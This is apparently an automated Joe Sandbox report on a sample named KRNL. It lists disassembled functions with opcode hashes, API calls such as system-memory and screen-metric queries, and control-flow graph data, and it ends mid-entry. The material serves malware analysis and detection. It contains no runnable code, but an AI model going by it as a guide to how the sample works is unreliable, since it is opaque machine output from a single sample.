                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: $$<.$X@$f@$i
                                                                                                                                                                                                                                                          • API String ID: 237503144-92190101
                                                                                                                                                                                                                                                          • Opcode ID: 173b7ab53e4ef546a75e85442e8143dd99584801225795e8cb45284878ed8cf0
                                                                                                                                                                                                                                                          • Instruction ID: 5d4d46c9a90ffb503717a27f7093fefa0dd82dfd25ea639eba7b9214d4ffac56
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 173b7ab53e4ef546a75e85442e8143dd99584801225795e8cb45284878ed8cf0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96528472A1C7508BC3649F39C4813EEB7E1AF85320F154A2EE8E9973D1D67899818B47
                                                                                                                                                                                                                                                          Function 004116A0 Relevance: 12.9, APIs: 4, Strings: 2, Instructions: 2356COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: &8$`
                                                                                                                                                                                                                                                          • API String ID: 0-842996520
                                                                                                                                                                                                                                                          • Opcode ID: 04d55245a6d6fe8c9061ae8d234f7c10597bb42f531ccff2a359901277746420
                                                                                                                                                                                                                                                          • Instruction ID: e733c91b1712801f5584cc40fcd09b41f9830b0468eb1d5c922baaacae7725df
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04d55245a6d6fe8c9061ae8d234f7c10597bb42f531ccff2a359901277746420
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0213D3B6D042148BDB14DF78C9413DEBBF1AF45310F1586AED859AB391E7388D81CB8A
                                                                                                                                                                                                                                                          Function 0043328C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1085 43328c-43336d call 413cd0 GetSystemMetrics * 2 1093 433374-433405 1085->1093
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: be52f64dafac1e5ff9b8b3963e09f4bf9d8351297948cd5fcb18972580f21498
                                                                                                                                                                                                                                                          • Instruction ID: d4d7d992982323047ebfbe64a21f998e07ffa76df3b32112bcb1f2418617eae3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be52f64dafac1e5ff9b8b3963e09f4bf9d8351297948cd5fcb18972580f21498
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB51A3B4E142089FCB40EFACD985A9EBBF0BF48310F10852AE498E7350D774A945CF96
                                                                                                                                                                                                                                                          Function 00426520 Relevance: 4.1, Strings: 3, Instructions: 380COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1096 426520-42653b 1097 426540-426576 1096->1097 1097->1097 1098 426578-426584 1097->1098 1099 426586-42658f 1098->1099 1100 4265c4-4265ce 1098->1100 1102 426590-426597 1099->1102 1101 4265d0-42661b 1100->1101 1101->1101 1103 42661d-426623 1101->1103 1104 4265a0-4265a6 1102->1104 1105 426599-42659c 1102->1105 1107 426985-42698e 1103->1107 1108 426629-426645 call 43b180 1103->1108 1104->1100 1106 4265a8-4265bc call 43cd20 1104->1106 1105->1102 1109 42659e 1105->1109 1112 4265c1 1106->1112 1114 426650-426685 1108->1114 1109->1100 1112->1100 1114->1114 1115 426687-426693 1114->1115 1116 426695-42669f 1115->1116 1117 4266cf-4266d3 1115->1117 1120 4266a0-4266a7 1116->1120 1118 4266d9-4266e2 1117->1118 1119 42697c-426982 call 43b1a0 1117->1119 1121 4266f0-426705 1118->1121 1119->1107 1123 4266b0-4266b6 1120->1123 1124 4266a9-4266ac 1120->1124 1121->1121 1126 426707-426709 1121->1126 1123->1117 1125 4266b8-4266c7 call 43cd20 1123->1125 1124->1120 1128 4266ae 1124->1128 1132 4266cc 1125->1132 1130 426710-42671f call 407f90 1126->1130 1131 42670b 1126->1131 1128->1117 1135 426740-42674a 1130->1135 1131->1130 1132->1117 1136 426730-42673e 1135->1136 1137 42674c-42674f 1135->1137 1136->1135 1138 426763-42676b 1136->1138 1139 426750-42675f 1137->1139 1140 426973-426979 call 407fa0 1138->1140 1141 426771-42677c 1138->1141 1139->1139 1142 426761 1139->1142 1140->1119 1143 4267cb-4267e4 call 407f90 1141->1143 1144 42677e-426789 1141->1144 1142->1136 1155 426907-42692f 1143->1155 1156 4267ea-4267f0 1143->1156 1146 4267a6-4267aa 1144->1146 1149 426790-426798 1146->1149 1150 4267ac-4267b5 1146->1150 1152 42679b-4267a4 1149->1152 1153 4267c0-4267c4 1150->1153 1154 4267b7-4267ba 1150->1154 1152->1143 1152->1146 1153->1152 1158 4267c6-4267c9 1153->1158 1154->1152 1157 426930-42694a 1155->1157 1156->1155 1159 4267f6-4267fc 1156->1159 1157->1157 1160 42694c-42696f call 408dd0 call 407fa0 1157->1160 1158->1152 1161 426800-42680a 1159->1161 1160->1140 1162 426820-426825 1161->1162 1163 42680c-426812 1161->1163 1166 426850-42685e 1162->1166 1167 426827-42682a 1162->1167 1165 4268b0-4268b6 1163->1165 1173 4268b8-4268be 1165->1173 1170 426860-426863 1166->1170 1171 4268ca-4268d3 1166->1171 1167->1166 1169 42682c-426841 1167->1169 1169->1165 1170->1171 1174 426865-4268a8 1170->1174 1177 4268d5-4268d7 1171->1177 1178 4268d9-4268dc 1171->1178 1173->1155 1176 4268c0-4268c2 1173->1176 1174->1165 1176->1161 1179 4268c8 1176->1179 1177->1173 1180 426903-426905 1178->1180 1181 4268de-426901 1178->1181 1179->1155 1180->1165 1181->1165
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: X`X*$l'Y9${$[7
                                                                                                                                                                                                                                                          • API String ID: 2994545307-1509796914
                                                                                                                                                                                                                                                          • Opcode ID: a7d4199a11afbcf664926020d9bbf2455d7265343a18d6926ad5fef2716d1da4
                                                                                                                                                                                                                                                          • Instruction ID: 627f6c153a1e7a7093b5324472515697c41291643dc6d7d1fda9c09fef2ffd72
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7d4199a11afbcf664926020d9bbf2455d7265343a18d6926ad5fef2716d1da4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5B15A72B043609BEB14CF14E84176B73A2EFD5304F96843EE8459B391E639EC09C389
                                                                                                                                                                                                                                                          Function 0040A8B0 Relevance: 4.1, Strings: 3, Instructions: 349COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1182 40a8b0-40a8e5 1183 40a8f0-40a920 1182->1183 1183->1183 1184 40a922-40aa1f 1183->1184 1185 40aa20-40aa59 1184->1185 1185->1185 1186 40aa5b-40aa74 1185->1186 1187 40aa80-40aa9a 1186->1187 1187->1187 1188 40aa9c-40aab1 call 40b640 1187->1188 1190 40aab6-40aabd 1188->1190 1191 40acd0-40acdc 1190->1191 1192 40aac3-40aacf 1190->1192 1193 40aad0-40aadb 1192->1193 1194 40aae2-40aaf6 1193->1194 1195 40aadd-40aae0 1193->1195 1196 40acc4 1194->1196 1197 40aafc-40ab11 1194->1197 1195->1193 1195->1194 1198 40acc7-40accd call 43b1a0 1196->1198 1199 40ab20-40ab3a 1197->1199 1198->1191 1199->1199 1200 40ab3c-40ab43 1199->1200 1202 40ab75-40ab79 1200->1202 1203 40ab45-40ab4c 1200->1203 1206 40acc2 1202->1206 1207 40ab7f-40aba7 1202->1207 1205 40ab57-40ab5c 1203->1205 1205->1206 1208 40ab62-40ab69 1205->1208 1206->1196 1209 40abb0-40abe6 1207->1209 1210 40ab6b-40ab6d 1208->1210 1211 40ab6f 1208->1211 1209->1209 1212 40abe8-40abf2 1209->1212 1210->1211 1213 40ab50-40ab55 1211->1213 1214 40ab71-40ab73 1211->1214 1215 40ac34-40ac38 1212->1215 1216 40abf4-40abff 1212->1216 1213->1202 1213->1205 1214->1213 1215->1206 1217 40ac3e-40ac46 1215->1217 1218 40ac17-40ac1b 1216->1218 1219 40ac50-40ac7d 1217->1219 1218->1206 1220 40ac21-40ac28 1218->1220 1219->1219 1223 40ac7f-40ac89 1219->1223 1221 40ac2a-40ac2c 1220->1221 1222 40ac2e 1220->1222 1221->1222 1224 40ac10-40ac15 1222->1224 1225 40ac30-40ac32 1222->1225 1226 40ac8b-40ac93 1223->1226 1227 40acdd-40acdf 1223->1227 1224->1215 1224->1218 1225->1224 1229 40aca7-40acab 1226->1229 1228 40ace8-40ad07 call 40a640 1227->1228 1228->1198 1229->1206 1231 40acad-40acb4 1229->1231 1233 40acb6-40acb8 1231->1233 1234 40acba 1231->1234 1233->1234 1235 40aca0-40aca5 1234->1235 1236 40acbc-40acc0 1234->1236 1235->1229 1237 40ace1-40ace6 1235->1237 1236->1235 1237->1228 1238 40ad09-40ad0b 1237->1238 1238->1198
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: F>]>$j>a>$ok
                                                                                                                                                                                                                                                          • API String ID: 0-2883800044
                                                                                                                                                                                                                                                          • Opcode ID: 9129864f14639d17449b2f603e3219f21eae55219ba341b137a72b1f0aae79bb
                                                                                                                                                                                                                                                          • Instruction ID: dd8b5e7c3122165f2fea48d4b4d2b9f00cb897ce1b6d78e13b6b522b53c881e4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9129864f14639d17449b2f603e3219f21eae55219ba341b137a72b1f0aae79bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76B1F17261C3118BD328DF14845156FBBF2EFD1304F16482DEAD5AB380D239A91ACB9B
                                                                                                                                                                                                                                                          Function 0042CE60 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 392COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CF80
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                          • String ID: 8a
                                                                                                                                                                                                                                                          • API String ID: 3960555810-1827930058
                                                                                                                                                                                                                                                          • Opcode ID: 81e50134e1fb4b6584dfc42dfbfb872d721f9fd4204c3a06ee038d379535b189
                                                                                                                                                                                                                                                          • Instruction ID: fc3ee4ebcf7795b95269f936594514899a52a37c83a41ea56dd400e4873d1426
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81e50134e1fb4b6584dfc42dfbfb872d721f9fd4204c3a06ee038d379535b189
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14B1F37160C3918BD729CF2AD85136BFBE1AFD6304F58886EE0D6873A1D7398405CB56
                                                                                                                                                                                                                                                          Function 0043D0D9 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: 9.$9.
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2940951921
                                                                                                                                                                                                                                                          • Opcode ID: 208d8e1e8e407b3aab538934c649c1b580c7efd0bc8ea0d94b0776a936eb48b6
                                                                                                                                                                                                                                                          • Instruction ID: f93bdb9af1b3060ada3c74757461e6e726e21cc43fcc8ee35440b0537a72968c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 208d8e1e8e407b3aab538934c649c1b580c7efd0bc8ea0d94b0776a936eb48b6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7414575E041206FE7049F28DD5072BB293ABDA315F14E63AD984E73D9DA789C2087C8
                                                                                                                                                                                                                                                          Function 0042C8D0 Relevance: 1.9, APIs: 1, Instructions: 364COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CF80
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3960555810-0
                                                                                                                                                                                                                                                          • Opcode ID: 0461e324be3076e302c2b43e19ad019a5e4dd1efb388be3de8ee3e0016c2b1d6
                                                                                                                                                                                                                                                          • Instruction ID: 0389c4d48cda137bc469657c8f973424e39e61ed96ceabf3f35c8008a6260973
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0461e324be3076e302c2b43e19ad019a5e4dd1efb388be3de8ee3e0016c2b1d6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADA10571A0C3918BE729CF2AD85136BFBE1AFD6304F58886EE0D587391D7398405CB56
                                                                                                                                                                                                                                                          Function 00414E25 Relevance: 1.8, APIs: 1, Instructions: 285COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c3c72d93ae102fda253e9b18f9f4e759999c11c12cd159e5bbea8afbf54f8cb9
                                                                                                                                                                                                                                                          • Instruction ID: ddd59b32adecc82288acb2027229a5aeb8c46ffcdc49d2923191268a2ca1eca9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3c72d93ae102fda253e9b18f9f4e759999c11c12cd159e5bbea8afbf54f8cb9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54A119B59083819FD724CB29C4507AFBBE1BFD9304F18492EE0DA87382D639D985CB56
                                                                                                                                                                                                                                                          Function 0043FB10 Relevance: 1.6, Strings: 1, Instructions: 360COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: mLjL
                                                                                                                                                                                                                                                          • API String ID: 2994545307-1911556848
                                                                                                                                                                                                                                                          • Opcode ID: 0d0a37e59aa2415a73e4c1409be01007e9c7a6054839f71ec17ff75bb0ca7d0b
                                                                                                                                                                                                                                                          • Instruction ID: 8475cca9f7a5a570b914ab5b93dd941b56f2e4823fdd83e04adae2a5f603aedc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d0a37e59aa2415a73e4c1409be01007e9c7a6054839f71ec17ff75bb0ca7d0b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4B12772E083118BD728CF14D89156FB7A2FFC8314F15953DE98A573A1DA39AC05C786
                                                                                                                                                                                                                                                          Function 0043CD20 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(00423382,00000002,00000014,000000FF,00000000,?,00000002,?), ref: 0043CD4E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                          Function 0040C942 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: G9
                                                                                                                                                                                                                                                          • API String ID: 0-2716091189
                                                                                                                                                                                                                                                          • Opcode ID: 2fc45742e1a3686705e5dce742a14d5a280d3b57a4ce65dfcae4e6ba49c632fe
                                                                                                                                                                                                                                                          • Instruction ID: 3b5bd5877d33dc8e27cd9c087e0f9001335ca5b0b3d528c35a28b92a38c22519
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc45742e1a3686705e5dce742a14d5a280d3b57a4ce65dfcae4e6ba49c632fe
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7412A736483118BD728CF14CC5176BB7B2EFC5310F0A5A2CE48567790E7789904D74A
                                                                                                                                                                                                                                                          Function 004400C0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: cc1def0ecf068c9e964342eea13a098f01eda3a67e33911835bef30bc145f795
                                                                                                                                                                                                                                                          • Instruction ID: d1964a0b6ec20b0ae5f3d5701f2f9b0f514b95607fc0800dfcb7b8fb3ca6f9ac
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1def0ecf068c9e964342eea13a098f01eda3a67e33911835bef30bc145f795
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 644155B59083108BE714CF24DC84A6BB7F1FFD5318F14852DEA895B3A0EB7A9815C786
                                                                                                                                                                                                                                                          Function 0043D9C1 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 3511ef42c4b007baf1fec548fa9812ccd487ed6d294edc1ac7bf06dcc82e3f6b
                                                                                                                                                                                                                                                          • Instruction ID: 96e49273ea620ae155524270832f03a61cff14ce2c4030ad9a9b34360ce12f08
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3511ef42c4b007baf1fec548fa9812ccd487ed6d294edc1ac7bf06dcc82e3f6b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA4123B0A083109FD718CF24D95073BB6E2EFC9705F14A52EE481A7394E7399C05C79A
                                                                                                                                                                                                                                                          Function 0043F040 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 9191ed74d0d8586d4a373cf941998efa4049e7a180d54467ad32adb286ee0df7
                                                                                                                                                                                                                                                          • Instruction ID: 2a5c568ff03cc436ede057be6d62a120ad0484157719e54bd9382df1f9979818
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9191ed74d0d8586d4a373cf941998efa4049e7a180d54467ad32adb286ee0df7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4021EEB94093049BC710CF18E88066BB7F5FFC9320F15693DE58897360E376A848C75A
                                                                                                                                                                                                                                                          Function 0040C08B Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: |X|X
                                                                                                                                                                                                                                                          • API String ID: 0-2218283020
                                                                                                                                                                                                                                                          • Opcode ID: ce84bb1b908e3da7b10efdad8a51853dd17b9261ed57cfd3814ffec2b1657eb9
                                                                                                                                                                                                                                                          • Instruction ID: 13b12417835161548989760e477e4b9bf18457aaa1a030ea2397493de378e4bd
